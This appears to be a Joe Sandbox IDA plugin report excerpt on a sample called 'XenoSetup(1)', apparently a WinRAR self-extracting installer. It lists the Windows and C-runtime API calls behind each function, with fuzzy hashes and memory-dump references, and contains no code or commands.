                                                                                      • API String ID: 3519838083-3505469590
                                                                                      • Opcode ID: 2f296402dcc797a773c7dfa4ba139b163de7badd31b590caa045c29699dad09c
                                                                                      • Instruction ID: 5969dee1718d95a3cd0aeb4ce6f9313a1c445eb96acc5448ec5d655af9fb7770
                                                                                      • Opcode Fuzzy Hash: 2f296402dcc797a773c7dfa4ba139b163de7badd31b590caa045c29699dad09c
                                                                                      • Instruction Fuzzy Hash: 29718071A00259EFDF14DFA6CC959AFBBB9FF48320B14015DE552AB2A0CB396D01DB50
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE9387
                                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FE93AA
                                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FE93C9
                                                                                        • Part of subcall function 00FEC29A: _wcslen.LIBCMT ref: 00FEC2A2
                                                                                        • Part of subcall function 00FF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FEC116,00000000,.exe,?,?,00000800,?,?,?,00FF8E3C), ref: 00FF1FD1
                                                                                      • _swprintf.LIBCMT ref: 00FE9465
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00FE94D4
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00FE9514
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                      • String ID: rtmp%d
                                                                                      • API String ID: 3726343395-3303766350
                                                                                      • Opcode ID: 87b37eb559d2561d96ff827083c0c2d146c4e0b8bebdb2b5e48c2e85aa53111f
                                                                                      • Instruction ID: e65d2d2347038f577655386c4aa6a23d364a6bb2bdc9ea0d0cd89337fd14a45c
                                                                                      • Opcode Fuzzy Hash: 87b37eb559d2561d96ff827083c0c2d146c4e0b8bebdb2b5e48c2e85aa53111f
                                                                                      • Instruction Fuzzy Hash: DC41A771904299A6CF21EB62CC55EEE73BCBF40350F0448A5B64AE3051DB7C8B89EB70
                                                                                      APIs
                                                                                      • __aulldiv.LIBCMT ref: 00FF122E
                                                                                        • Part of subcall function 00FEB146: GetVersionExW.KERNEL32(?), ref: 00FEB16B
                                                                                      • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00FF1251
                                                                                      • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00FF1263
                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FF1274
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1284
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1294
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00FF12CF
                                                                                      • __aullrem.LIBCMT ref: 00FF1379
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                      • String ID:
                                                                                      • API String ID: 1247370737-0
                                                                                      • Opcode ID: d332106af099b0785d133554c9e640e7a9b702eeaecb54711cb6cdb6c5d7cc7c
                                                                                      • Instruction ID: e06291bd0c5d5c3c3c76eb94e735e4e3c63aa79818cbb738873f9a12c930161f
                                                                                      • Opcode Fuzzy Hash: d332106af099b0785d133554c9e640e7a9b702eeaecb54711cb6cdb6c5d7cc7c
                                                                                      • Instruction Fuzzy Hash: CD4115B2508309AFC710DF65C88496BBBF9FF88714F00892EF696C6210E739E549DB52
                                                                                      APIs
                                                                                      • _swprintf.LIBCMT ref: 00FE2536
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                        • Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                      • API String ID: 3053425827-2277559157
                                                                                      • Opcode ID: 84b31b0bd24f207534317bef8e14f2062a0818485ffd5e9b5cf7b0cea1cc1e43
                                                                                      • Instruction ID: 7bf21f3e0f47576e28c9056e24ed4108a6bf6ea768a52d1f553ff95303b10478
                                                                                      • Opcode Fuzzy Hash: 84b31b0bd24f207534317bef8e14f2062a0818485ffd5e9b5cf7b0cea1cc1e43
                                                                                      • Instruction Fuzzy Hash: C7F13C71A043C09BDB25DB2A8895BFE77DD6F90300F08057DFD859B283DB688945E7A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: </p>$</style>$<br>$<style>$>
                                                                                      • API String ID: 176396367-3568243669
                                                                                      • Opcode ID: e10248e76129255c3e55e508c5da24bd9dffcb9c757e4c12671d082e2ab0caba
                                                                                      • Instruction ID: 1aa7d9709fa24e84468b9183b53b7ca11f0d8792fd34a05ddd846b6010451799
                                                                                      • Opcode Fuzzy Hash: e10248e76129255c3e55e508c5da24bd9dffcb9c757e4c12671d082e2ab0caba
                                                                                      • Instruction Fuzzy Hash: FF51F866F4932B95DB309A159C1177A73E0DFA4770F78041AEBC18B2F0FBE58C41A265
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0100FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0100F6CF
                                                                                      • __fassign.LIBCMT ref: 0100F74A
                                                                                      • __fassign.LIBCMT ref: 0100F765
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0100F78B
                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,0100FE02,00000000,?,?,?,?,?,?,?,?,?,0100FE02,00000000), ref: 0100F7AA
                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,0100FE02,00000000,?,?,?,?,?,?,?,?,?,0100FE02,00000000), ref: 0100F7E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: 4ab2a5e0c55a2dcd49ad7aa827e26ffa9dc54471ace8b0b59ea1609139ceaf8d
                                                                                      • Instruction ID: e18f882d8e76944b7645822762045ce6ea74177b8426c9af9a6b687988073d06
                                                                                      • Opcode Fuzzy Hash: 4ab2a5e0c55a2dcd49ad7aa827e26ffa9dc54471ace8b0b59ea1609139ceaf8d
                                                                                      • Instruction Fuzzy Hash: 2951BBB5E0024A9FEB21CFA8D885AEDBFF4FF09310F14415AE695E7281D774A641CB50
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01002937
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0100293F
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 010029C8
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 010029F3
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01002A48
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: 6aa7c4c4f8832dd3d521326468c48662e3d1700e2978ef22e325a3d6ff618257
                                                                                      • Instruction ID: cefaecfbffd7cda2cbd7aa81867a3a82523c1bba8a82176b85ac0de5470b65fa
                                                                                      • Opcode Fuzzy Hash: 6aa7c4c4f8832dd3d521326468c48662e3d1700e2978ef22e325a3d6ff618257
                                                                                      • Instruction Fuzzy Hash: 4541C334A00209AFEF12DF68C888A9EBFF1BF45324F148095E8956B3D2D7359A51CB91
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00FF9EEE
                                                                                      • GetWindowRect.USER32(?,00000000), ref: 00FF9F44
                                                                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00FF9FDB
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00FF9FE3
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00FF9FF9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$RectText
                                                                                      • String ID: RarHtmlClassName
                                                                                      • API String ID: 3937224194-1658105358
                                                                                      • Opcode ID: 60d0e726fc34768e68662c77b1022cbb0eb8c186078a1b9a7578362141527456
                                                                                      • Instruction ID: 51dac22816424ff1184f4dcc620f8bd4ac4f417696d4cdb5617ecb967431495c
                                                                                      • Opcode Fuzzy Hash: 60d0e726fc34768e68662c77b1022cbb0eb8c186078a1b9a7578362141527456
                                                                                      • Instruction Fuzzy Hash: 0A410571408224AFDB215F64DD88F6B7BB8FF48311F008518FA899D1AACB78E814DB61
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                      • API String ID: 176396367-3743748572
                                                                                      • Opcode ID: c4ebec1ae922ca98a7bd81d2a0d3a00035fa6a5e95f9f51467d69b5ff53a5079
                                                                                      • Instruction ID: ee782d738c2f52d780a085eaf04084a28b8690fc33881b281160fbad2c1ebe8e
                                                                                      • Opcode Fuzzy Hash: c4ebec1ae922ca98a7bd81d2a0d3a00035fa6a5e95f9f51467d69b5ff53a5079
                                                                                      • Instruction Fuzzy Hash: 67314C36A4834A56E631AB549C41BB773A4EF90730F50441EE6C29B2E0FBE9AD5093A1
                                                                                      APIs
                                                                                        • Part of subcall function 0100C868: _free.LIBCMT ref: 0100C891
                                                                                      • _free.LIBCMT ref: 0100C8F2
                                                                                        • Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
                                                                                        • Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4
                                                                                      • _free.LIBCMT ref: 0100C8FD
                                                                                      • _free.LIBCMT ref: 0100C908
                                                                                      • _free.LIBCMT ref: 0100C95C
                                                                                      • _free.LIBCMT ref: 0100C967
                                                                                      • _free.LIBCMT ref: 0100C972
                                                                                      • _free.LIBCMT ref: 0100C97D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                      • Instruction ID: 7382a0b8795207cc80ea0ee446653e209b6530c1393bdce452f3c078860a0a09
                                                                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                      • Instruction Fuzzy Hash: C8115171990B06AAF522B7B1CD05FCB7BACAF20B10F404E56B2DD660D1DA75B605C750
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00FFE669,00FFE5CC,00FFE86D), ref: 00FFE605
                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00FFE61B
                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00FFE630
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                      • API String ID: 667068680-1718035505
                                                                                      • Opcode ID: 1903bfdca92ff41395a07e51528cd5ba4bf948060f95a7ff3fa054e61f5e64c7
                                                                                      • Instruction ID: 4ad4e2e079d578c98a81251b49192ef04afef2244aaa5b7ea4c5064399af8019
                                                                                      • Opcode Fuzzy Hash: 1903bfdca92ff41395a07e51528cd5ba4bf948060f95a7ff3fa054e61f5e64c7
                                                                                      • Instruction Fuzzy Hash: DBF0C272B6032E9B4B324D659D9467633C86E25B65300043EEB85DB134EB2DCC907B94
                                                                                      APIs
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF14C2
                                                                                        • Part of subcall function 00FEB146: GetVersionExW.KERNEL32(?), ref: 00FEB16B
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FF14E6
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FF1500
                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FF1513
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1523
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1533
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2092733347-0
                                                                                      • Opcode ID: dc773d469f8663d0185e591390c49c7a0cb6a6c1e1ec766d66489d2b81b7c662
                                                                                      • Instruction ID: 79392f9d5201d51e4537b735decc51dff0d85ed4d68b5d9963ebcb9850006b2c
                                                                                      • Opcode Fuzzy Hash: dc773d469f8663d0185e591390c49c7a0cb6a6c1e1ec766d66489d2b81b7c662
                                                                                      • Instruction Fuzzy Hash: A531E875108345ABC704DFA8C88499BBBF8BF98754F044A1EF995C3210E734D549CBA6
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,01002AF1,010002FC,00FFFA34), ref: 01002B08
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01002B16
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01002B2F
                                                                                      • SetLastError.KERNEL32(00000000,01002AF1,010002FC,00FFFA34), ref: 01002B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: e5a107b418a22f2bb3333e75e14425f4eb82d1b6ab184a7d43565491058c437a
                                                                                      • Instruction ID: 4442457572d73e0340f6638664d8488b857afe84651e7322209ff3c855dc9048
                                                                                      • Opcode Fuzzy Hash: e5a107b418a22f2bb3333e75e14425f4eb82d1b6ab184a7d43565491058c437a
                                                                                      • Instruction Fuzzy Hash: A401D432118B126EF66B29B8BC8CA6B2B99FF517B4F60073AF9D0590D4EF1A48009344
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,01021030,01004674,01021030,?,?,01003F73,00000050,?,01021030,00000200), ref: 010097E9
                                                                                      • _free.LIBCMT ref: 0100981C
                                                                                      • _free.LIBCMT ref: 01009844
                                                                                      • SetLastError.KERNEL32(00000000,?,01021030,00000200), ref: 01009851
                                                                                      • SetLastError.KERNEL32(00000000,?,01021030,00000200), ref: 0100985D
                                                                                      • _abort.LIBCMT ref: 01009863
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 2b221ac9264a7f04bb3fe257d9d69d20ff90504368fceef87e6cc74b45f6fdbc
                                                                                      • Instruction ID: 67e663843fe180278d2b4973b8151f8b606ce24c680483514d79222f63089935
                                                                                      • Opcode Fuzzy Hash: 2b221ac9264a7f04bb3fe257d9d69d20ff90504368fceef87e6cc74b45f6fdbc
                                                                                      • Instruction Fuzzy Hash: 06F0F935540A03A7F6673238BC04B9F1AA5AFE0B78F210125F6DC962C2EE2985018324
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FFDC47
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFDC61
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFDC72
                                                                                      • TranslateMessage.USER32(?), ref: 00FFDC7C
                                                                                      • DispatchMessageW.USER32(?), ref: 00FFDC86
                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FFDC91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
